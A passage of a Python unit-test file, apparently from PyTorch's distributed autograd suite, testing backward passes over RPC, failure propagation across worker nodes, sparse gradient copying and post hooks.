def test_backward_different_tensor_dims(self):
local_grads = None
t1 = torch.rand((4, 6), requires_grad=True)
t2 = torch.rand((6, 5))
t3 = torch.rand((5, 7), requires_grad=True)
t4 = torch.rand((7, 9))
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
val = self._exec_func(exec_mode, torch.matmul, t1, t2)
val = self._exec_func(exec_mode, torch.linalg.multi_dot, (val, t3, t4))
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t2, t3, t4
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_unused_tensors(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
s = self._exec_func(exec_mode, torch.stack, (t1, t2, t3))
val = self._exec_func(
exec_mode,
torch.matmul,
torch.narrow(s, 0, 0, 1),
torch.narrow(s, 0, 2, 1),
)
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2, t3
)
local_grads = ret if ret else local_grads
@dist_init
def test_backward_multiple_output_tensors(self):
local_grads = None
t = torch.rand((10, 2), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
tensor_list = self._exec_func(exec_mode, torch.split, t, 2)
t1 = tensor_list[0]
t2 = tensor_list[2]
t3 = tensor_list[4]
val = self._exec_func(exec_mode, torch.linalg.multi_dot, (t1, t2, t3))
loss = val.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t
)
local_grads = ret if ret else local_grads
def _run_test_backward_unused_send_function_in_thread(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
            # We don't use the result of the RPC function; as a result, the
            # backward pass would hang in the "FAST" mode.
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
val = torch.mul(t1, t2)
            # Run backward; this would hang forever.
dist_autograd.backward(context_id, [val.sum()])
@dist_init
def test_backward_unused_send_function(self):
# Run the test in a thread which would never finish.
t = threading.Thread(
target=self._run_test_backward_unused_send_function_in_thread
)
t.daemon = True
t.start()
t.join(10) # Wait for 10s.
# Verify thread is still alive (indicating backward hasn't completed yet).
self.assertTrue(t.is_alive())
@dist_init
def test_backward_autograd_engine_error(self):
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
# Perform some ops before error simulation.
tmp = (t1 + t2) * (t1 + t2)
t3 = SimulateBackwardError.apply(tmp)
# Run multiple round trips across different nodes and verify the
# original node receives an error thrown on a node deep in the chain.
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t2, t3)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.mul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(val, t2)
)
val = rpc.rpc_sync(
worker_name(self._next_rank()), torch.div, args=(val, t2)
)
with self.assertRaisesRegex(
RuntimeError, "Error on Node [0-9]+: Simulate error on backward pass"
):
# Run backwards, and validate we receive an error.
dist_autograd.backward(context_id, [val.sum()])
@dist_init(clean_shutdown=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure(self):
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
# Wait for all RPCs to be done.
dist.barrier()
# Kill all odd rank nodes.
if self.rank % 2 == 0:
shutdown_error_regex = self.get_shutdown_error_regex()
# Wait for all other nodes to die.
for rank in range(self.world_size):
if rank % 2 != 0:
wait_until_node_failure(rank, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex()
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since all
# other nodes are dead.
dist_autograd.backward(context_id, [res.sum()])
else:
# Exit all other nodes.
pass
@dist_init
def test_backward_without_context(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
res = rpc.rpc_sync(
worker_name(self._next_rank()), torch.add, args=(t1, t2)
)
dist_autograd.backward(context_id, [res.sum()])
@dist_init
def test_backward_without_rpc(self):
dst_rank = self.rank
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = torch.add(t1, t2)
dist_autograd.backward(context_id, [t3.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(torch.ones(3, 3), grads[t1])
self.assertEqual(torch.ones(3, 3), grads[t2])
@dist_init
def test_backward_invalid_args(self):
with dist_autograd.context() as context_id:
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(context_id, None)
with self.assertRaisesRegex(TypeError, "incompatible function arguments"):
dist_autograd.backward(None, None)
with self.assertRaisesRegex(
RuntimeError, "No tensors provided for gradient computation"
):
dist_autograd.backward(context_id, [])
with self.assertRaisesRegex(RuntimeError, "requires_grad not set on"):
t = torch.rand(3, 3)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "is not a scalar, all roots need to be scalar"
):
t = torch.rand(3, 3, requires_grad=True)
dist_autograd.backward(context_id, [t])
with self.assertRaisesRegex(
RuntimeError, "does not have a valid gradient function"
):
t = torch.rand(1, requires_grad=True)
dist_autograd.backward(context_id, [t])
@dist_init
def test_backward_multiple_roots(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC]:
with dist_autograd.context() as context_id:
r1 = self._exec_func(exec_mode, torch.add, t1, t2).sum()
r2 = self._exec_func(exec_mode, torch.mul, t1, t2).sum()
r3 = self._exec_func(exec_mode, torch.cos, t1).sum()
r4 = self._exec_func(exec_mode, torch.div, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [r1, r2, r3, r4], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_different_dtypes(self):
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True, dtype=torch.float32)
t2 = torch.rand((3, 3), requires_grad=True, dtype=torch.float64)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
loss = self._exec_func(exec_mode, torch.add, t1, t2).sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_python_udf(self):
        # Run the same code locally and with dist autograd and verify the
        # gradients are the same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, my_py_add, t1, t2)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@dist_init
def test_backward_simple_script_call(self):
        # Run the same code locally and with dist autograd and verify the
        # gradients are the same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [
ExecMode.LOCAL,
ExecMode.RPC_SYNC,
ExecMode.RPC_ASYNC,
ExecMode.REMOTE,
]:
with dist_autograd.context() as context_id:
forward_ret = self._exec_func(exec_mode, my_script_add, t1, t2)
loss = forward_ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@staticmethod
def _complex_python_udf(t1, t2):
t3 = torch.nn.functional.linear(t1, t2)
t4 = torch.nn.functional.linear(t2, t3)
t5 = torch.nn.functional.linear(t3, t4)
return torch.linalg.multi_dot([t1, t2, t3, t4, t5])
@dist_init
def test_backward_complex_python_udf(self):
        # Run the same code locally and with dist autograd and verify the
        # gradients are the same.
local_grads = None
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
for exec_mode in [ExecMode.LOCAL, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._complex_python_udf, t1, t2
)
loss = ret.sum()
local_grads = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
@staticmethod
def _python_udf_with_backward_error(t1, t2):
t3 = t1 + t2
t4 = SimulateBackwardError.apply(t3)
return torch.linalg.multi_dot([t1, t2, t3, t4])
@staticmethod
def _nested_rpc_call_backward_error(t1, t2, dst):
t1 = t1 * t2
t2 = t1 + t2
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2),
)
return torch.linalg.multi_dot([t1, t2, res])
@dist_init
def test_backward_python_udf_error(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_rpc_call_backward_error,
args=(t1, t2, self._next_rank()),
)
with self.assertRaisesRegex(
RuntimeError, "Simulate error on backward pass"
):
dist_autograd.backward(context_id, [loss.sum()])
_backward_done = False
@dist_init(clean_shutdown=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_backward_node_failure_python_udf(self):
# Set a short timeout to quickly time out failed RPCs.
rpc._set_rpc_timeout(5) # 5 seconds
initialize_pg(self.file_init_method, self.rank, self.world_size)
with dist_autograd.context() as context_id:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
dst = self._next_rank()
res = rpc.rpc_sync(
worker_name(dst),
my_py_nested_call,
args=(t1, t2, dst, self.world_size, 1),
)
dist.barrier()
# Kill rank 2 (last hop of nested rpc) and verify rank 0 receives an error.
if self.rank == 2:
return
store = dist.distributed_c10d._get_default_store()
if self.rank == 0:
# Wait for rank 2 to die.
shutdown_error_regex = self.get_shutdown_error_regex()
wait_until_node_failure(2, shutdown_error_regex)
# Shutdown sequence is not very well defined and as a result
# we might see any error given by get_shutdown_error_regex().
with self.assertRaisesRegex(RuntimeError, shutdown_error_regex):
# Run backwards, and validate we receive an error since rank 2 is dead.
dist_autograd.backward(context_id, [res.sum()])
                # Mark rank 0 as done in the store, since the RPC framework on
                # some nodes might be broken at this point (listenLoop() in
                # ProcessGroupAgent might've exited).
store.set('test_backward_node_failure_python_udf_rank0_done', "True")
else:
# Wait for backward to finish on rank 0.
store.wait(['test_backward_node_failure_python_udf_rank0_done'], timedelta(seconds=10))
@staticmethod
def _nested_python_udf(t1, t2, dst):
t3 = t1 * t2
t4 = t1 + t2
res = rpc.rpc_sync(worker_name(dst), my_py_add, args=(t3, t4))
return torch.linalg.multi_dot([t1, t2, t3, t4, res])
@dist_init
def test_backwards_nested_python_udf(self):
# Run equivalent of _nested_python_udf locally.
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
t3 = t1 * t2
t4 = t1 + t2
res = t3 + t4
loss = torch.linalg.multi_dot([t1, t2, t3, t4, res]).sum()
torch.autograd.backward([loss])
# Now run distributed autograd.
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._nested_python_udf,
args=(t1, t2, self._next_rank()),
)
dist_autograd.backward(context_id, [loss.sum()])
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
_test_clean_context_backward_context_id = None
class MyBackwardFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
assert DistAutogradTest._test_clean_context_backward_context_id is not None
# Release the context to simulate error (use barrier before releasing
# context to ensure all nodes execute the backward function).
dist.barrier()
dist_autograd._release_context(
DistAutogradTest._test_clean_context_backward_context_id
)
# Verify all contexts are cleaned up.
assert _all_contexts_cleaned_up()
return input
@dist_init
def test_clean_context_during_backward(self):
"""
This test simulates the situation where the 'backward' call might throw
an exception locally which would lead to the autograd context being
cleaned up if we're using the context manager. As a result, the autograd
context might be cleaned up while some threads are still using the
autograd context.
It is fine for the 'backward' call to throw an exception in this test,
but the process should not crash.
"""
initialize_pg(self.file_init_method, self.rank, self.world_size)
context = dist_autograd._new_context()
context_id = context._context_id()
DistAutogradTest._test_clean_context_backward_context_id = context_id
# Send the context id to all nodes.
for i in range(0, self.world_size):
if i != self.rank:
rank_distance = (i - self.rank + self.world_size) % self.world_size
rpc.rpc_sync(
worker_name(i),
_set_rpc_done,
args=(context_id, rank_distance),
)
dist.barrier()
# Verify all context ids have been received.
self.assertEqual(self.world_size - 1, len(known_context_ids))
t1 = torch.rand((3, 3), requires_grad=True)
for i in range(0, 100):
dst = self._next_rank()
t1 = rpc.rpc_sync(worker_name(dst), torch.add, args=(t1, t1))
# Call MyBackwardFunc as the first op of the backward pass to
# ensure we release the context early in the backward pass.
t1 = DistAutogradTest.MyBackwardFunc.apply(t1)
self.assertEqual(100, len(context._send_functions()))
context_id = 100 # dummy context_id
with self.assertRaisesRegex(
RuntimeError,
"Could not find autograd context with id: {}".format(context_id),
):
dist_autograd.backward(context_id, [t1.sum()])
# HACK: Killing workers since otherwise the autograd engine gets stuck on
# other nodes. The proper fix would be addressing:
# https://github.com/pytorch/pytorch/issues/27643, which would inform
# other nodes about the failure.
# The autograd engine gets stuck on other nodes since they're waiting to
# receive gradients from the node that received an error (and as a
# result it didn't execute the rest of the graph).
dist.barrier()
rpc.shutdown(graceful=False)
sys.exit(0)
@classmethod
def _call_remote_embedding(cls, embedding_rref, input, offsets, per_sample_weights):
embedding = embedding_rref.local_value()
return embedding(input, offsets, per_sample_weights)
@classmethod
def _get_grad(cls, embedding_rref, context_id):
embedding = embedding_rref.local_value()
grad_map = dist_autograd.get_gradients(context_id)
# Can't send sparse tensors over RPC: https://github.com/pytorch/pytorch/issues/30807
return grad_map[embedding.weight].to_dense()
@dist_init
def test_embedding_bag_with_no_grad_tensors(self):
dst = self._next_rank()
remote_embedding = rpc.remote(
worker_name(dst),
torch.nn.EmbeddingBag,
args=(16, 16),
kwargs={"mode": "sum", "sparse": True},
)
local_embedding = torch.nn.EmbeddingBag(16, 16, mode="sum", sparse=True)
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
# requires_grad = True to record send/recv functions
per_sample_weights = torch.rand((8), requires_grad=True)
offsets = torch.LongTensor([0, 4])
local_res = local_embedding(input, offsets, per_sample_weights)
# Run backward twice.
torch.autograd.backward([local_res.sum()], retain_graph=True)
torch.autograd.backward([local_res.sum()])
local_grad = local_embedding.weight.grad
with dist_autograd.context() as context_id:
res = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._call_remote_embedding,
args=(remote_embedding, input, offsets, per_sample_weights),
)
# Run backward twice to test accumulation of sparse gradients.
dist_autograd.backward(context_id, [res.sum()], retain_graph=True)
dist_autograd.backward(context_id, [res.sum()])
remote_grad = rpc.rpc_sync(
worker_name(dst),
DistAutogradTest._get_grad,
args=(remote_embedding, context_id),
)
self.assertEqual(local_grad.to_dense(), remote_grad)
@classmethod
def _mixed_requires_grad(cls, t1, t2):
if t2.requires_grad:
return t1 - t2
else:
return t1 * t2
@dist_init
def test_mixed_requires_grad(self):
for exec_mode in [ExecMode.RPC_SYNC, ExecMode.REMOTE]:
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=False)
with dist_autograd.context() as context_id:
ret = self._exec_func(
exec_mode, DistAutogradTest._mixed_requires_grad, t1, t2
)
self.assertEqual(t1 * t2, ret)
dist_autograd.backward(context_id, [ret.sum()])
self.assertTrue(t1.requires_grad)
self.assertFalse(t2.requires_grad)
grads = dist_autograd.get_gradients(context_id)
self.assertIn(t1, grads)
self.assertNotIn(t2, grads)
self.assertEqual(t2, grads[t1])
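    # Custom Function whose backward pass inspects the dist autograd debug info while
    # a distributed backward pass is still in flight on every rank.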
class TestDebugInfoFunc(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
@once_differentiable
def backward(ctx, input):
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
backward_passes = int(debug_info["num_current_backward_passes"])
# Hard to validate exact numbers because of the distributed nature.
# We can't use a barrier() here since that would block the single
# CPU thread available for autograd and can cause deadlocks.
assert backward_passes >= 1 and backward_passes <= 4
return input
@dist_init
def test_debug_info(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
i = 0
res = {}
res[i] = t1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
            # Call the custom function in the middle of the backward pass to
            # ensure all nodes are still waiting on a backward().
res[i + 1] = DistAutogradTest.TestDebugInfoFunc.apply(res[i])
i += 1
for rank in range(self.world_size):
if rank != self.rank:
res[i + 1] = rpc.rpc_sync(
worker_name(rank), torch.add, args=(res[i], t2)
)
i += 1
dist_autograd.backward(context_id, [res[i].sum()])
debug_info = dist_autograd._get_debug_info()
num_autograd_context = int(debug_info["num_autograd_contexts"])
            # Need at least one context and not more than 4.
self.assertTrue(num_autograd_context >= 1 and num_autograd_context <= 4)
for rd in range(self.world_size - 1):
rpc.rpc_sync(
worker_name((self.rank + rd + 1) % self.world_size),
_set_rpc_done,
args=(context_id, rd + 1),
)
dist.barrier()
# Validate information
debug_info = dist_autograd._get_debug_info()
assert debug_info is not None
self.assertEqual(0, int(debug_info["num_current_backward_passes"]))
        # only have `num_current_backward_passes` and `num_autograd_contexts`
self.assertTrue(len(debug_info) == 2)
self.assertTrue(_all_contexts_cleaned_up())
# All contexts should be cleaned up.
debug_info = dist_autograd._get_debug_info()
self.assertEqual(0, int(debug_info["num_autograd_contexts"]))
@staticmethod
def _workload_thread():
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = rpc.rpc_sync("worker0", torch.add, args=(t1, t2))
t4 = rpc.rpc_sync("worker0", torch.mul, args=(t2, t3))
t5 = rpc.rpc_sync("worker0", torch.matmul, args=(t3, t4))
t6 = rpc.rpc_sync("worker0", torch.add, args=(t4, t5))
dist_autograd.backward(context_id, [t6.sum()])
@dist_init
def test_async_dist_autograd(self):
"""
This test ensures async processing for distributed autograd works
appropriately. This is achieved by spawning multiple threads and
hammering a single node with a lot of backward() calls.
"""
initialize_pg(self.file_init_method, self.rank, self.world_size)
if self.rank != 0:
# All other ranks schedule work on rank 0.
threads = []
for i in range(20):
t = threading.Thread(target=DistAutogradTest._workload_thread)
t.start()
threads.append(t)
for thread in threads:
thread.join()
dist.barrier()
@dist_init
def test_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
t3 = torch.matmul(t1, t2)
# Run backward twice.
torch.autograd.backward([t3.sum()], retain_graph=True)
torch.autograd.backward([t3.sum()])
t3 = rpc.rpc_sync(
worker_name(self._next_rank()), torch.matmul, args=(t1, t2)
)
# Run backward twice.
dist_autograd.backward(context_id, [t3.sum()], retain_graph=True)
dist_autograd.backward(context_id, [t3.sum()])
            # Verify the gradients are the same for local and remote execution.
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(2, len(grads))
self.assertIn(t1, grads)
self.assertIn(t2, grads)
self.assertEqual(t1.grad, grads[t1])
self.assertEqual(t2.grad, grads[t2])
@staticmethod
def _test_nested_backward_accumulate_grads(t1, t2, dst_rank):
return rpc.rpc_sync(worker_name(dst_rank), torch.matmul, args=(t1, t2))
@dist_init
def test_nested_backward_accumulate_grads(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
DistAutogradTest._test_nested_backward_accumulate_grads,
args=(t1, t2, self._next_rank()),
).sum()
# Run backward twice.
dist_autograd.backward(context_id, [loss], retain_graph=True)
dist_autograd.backward(context_id, [loss])
@dist_init
def test_multiple_backward(self):
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
worker_name(self._next_rank()),
torch.add,
args=(t1, t2)).sum()
# Run backward in a loop multiple times.
for i in range(1000):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init(clean_shutdown=False)
def test_multiple_backward_with_errors(self):
initialize_pg(self.file_init_method, self.rank, self.world_size)
t1 = torch.rand((3, 3), requires_grad=True)
t2 = torch.rand((3, 3), requires_grad=True)
with dist_autograd.context() as context_id:
loss = rpc.rpc_sync(
'worker{}'.format(self._next_rank()),
DistAutogradTest._python_udf_with_backward_error,
args=(t1, t2)).sum()
try:
# Run backward in a loop multiple times.
for i in range(100):
if i < 50:
with self.assertRaisesRegex(RuntimeError, "Simulate error on backward pass"):
dist_autograd.backward(context_id, [loss], retain_graph=True)
elif i > 50:
# Recovered from error.
dist_autograd.backward(context_id, [loss], retain_graph=True)
else:
dist.barrier()
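                        # At iteration 50, turn the simulated error off; the
                        # surrounding barriers ensure every worker observes the
                        # flag change before the recovery iterations run.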
SimulateBackwardError._simulate_error = False
dist.barrier()
finally:
# Sync before resetting flag.
dist.barrier()
# Reset the flag.
SimulateBackwardError._simulate_error = True
@dist_init
def test_backward_verify_hooks(self):
t1 = torch.ones((3, 3), requires_grad=True)
# Double the gradient.
t1.register_hook(lambda grad: grad * 2)
t2 = torch.ones((3, 3), requires_grad=True)
local_grads = None
for exec_mode in [ExecMode.LOCAL, ExecMode.RPC_SYNC, ExecMode.REMOTE]:
with dist_autograd.context() as context_id:
ret = self._exec_func(exec_mode, torch.matmul, t1, t2)
loss = ret.sum()
ret = self._verify_backwards(
exec_mode, [loss], context_id, local_grads, t1, t2
)
local_grads = ret if ret else local_grads
@dist_init
def test_no_grad_copy(self):
'''
Similar to test in test_autograd.py.
'''
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class MyFuncSingleGrad(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFuncSingleGrad.static_grad_ptr = grad.data_ptr()
return grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [NonContGradFunc.apply(MyFunc.apply(a, b))])
grads = dist_autograd.get_gradients(context_id)
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for a
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFuncSingleGrad.apply(a)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFuncSingleGrad.static_grad_ptr
p_a = grads[a].data_ptr()
# Verify there was no clone.
self.assertTrue(p_a == p_g)
# Test case that should trigger copy for both of a,b. This is
# different in the distributed autograd case since we hold
# a reference to all grads in a vector until all accumulation is done.
with dist_autograd.context() as context_id:
dist_autograd.backward(context_id, [MyFunc.apply(a, b)[1][0]])
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a].data_ptr()
p_b = grads[b].data_ptr()
            # check that a and b use different grad buffers
self.assertFalse(p_a == p_b)
# both should be copied.
self.assertFalse(grads[a].data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(grads[b].data_ptr() == MyFunc.static_grad_ptr)
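    # Same idea as test_no_grad_copy, but exercised with sparse gradients produced by
    # embedding_bag(..., sparse=True).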
@dist_init
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
                # Create a sparse tensor with non-contiguous indices and values
                # and return it as the grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for a.
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
# check a uses the same buffer
self.assertTrue(p_a == p_g)
# Run backwards multiple times.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
        # With non-contiguous indices and values, we should trigger a copy.
with dist_autograd.context() as context_id:
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = NonContGradFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
p_b = grads[b]._values().data_ptr()
            # check that a and b use different grad buffers
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to verify accumulation.
for i in range(10):
dist_autograd.backward(context_id, [loss], retain_graph=True)
@dist_init
def test_grad_copy_sparse_indices_extra_ref(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
static_grad_indices_ref = None
static_grad_values_ref = None
@staticmethod
def forward(ctx, inp):
return inp
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
# indices() and values() return views, so holding onto
# references of them would not increment refcount of indices
# and values inside the sparse tensor.
MyFunc.static_grad_indices_ref = grad._indices()
MyFunc.static_grad_values_ref = grad._values()
return grad
a = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
with dist_autograd.context() as context_id:
emb_matrix = MyFunc.apply(a)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
dist_autograd.backward(context_id, [loss], retain_graph=True)
grads = dist_autograd.get_gradients(context_id)
p_g = MyFunc.static_grad_ptr
p_a = grads[a]._values().data_ptr()
self.assertIsNotNone(MyFunc.static_grad_indices_ref)
self.assertIsNotNone(MyFunc.static_grad_values_ref)
# grad would be stolen, since static_grad_indices_ref and
# static_grad_values_ref are holding onto views and don't bump the
# refcount.
self.assertTrue(p_g == p_a)
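    # Post hooks registered on AccumulateGrad nodes should still fire when the
    # backward pass is driven by dist_autograd instead of torch.autograd.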
@dist_init
def test_post_hooks(self):
self.hook_called_times = 0
def post_hook_add_one(output_grads, input_grads):
self.hook_called_times += 1
return output_grads
def post_hook_add_two(output_grads, input_grads):
self.hook_called_times += 2
return output_grads
t = torch.rand(10, 10, requires_grad=True)
a = t + t
# Register post hooks
accumulate_grad_0 = a.grad_fn.next_functions[0][0]
accumulate_grad_0.register_hook(post_hook_add_one)
accumulate_grad_0.register_hook(post_hook_add_two)
accumulate_grad_1 = a.grad_fn.next_functions[1][0]
accumulate_grad_1.register_hook(post_hook_add_two)
with dist_autograd.context() as context_id:
loss = a.sum()
dist_autograd.backward(context_id, [loss])
self.assertEqual(5, self.hook_called_times)
grads = dist_autograd.get_gradients(context_id)
self.assertEqual(1, len(grads))
self.assertTrue(t in grads)
@staticmethod
def _slow_add(t1, t2):
time.sleep(1)
t3 = t1 + t2
t3.requires_grad = True
return t3
@dist_init
def test_thread_local_context_id(self):
t1 = torch.rand((3, 3))
t2 = torch.rand((3, 3))
t3 = t1 + t2
t3.requires_grad = True
t3.sum().backward()
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, DistAutogradTest._slow_add, args=(t1, t2))
with dist_autograd.context() as context_id:
loss = rref.to_here().sum()
# due to slow add, the continuation of this backward pass will be
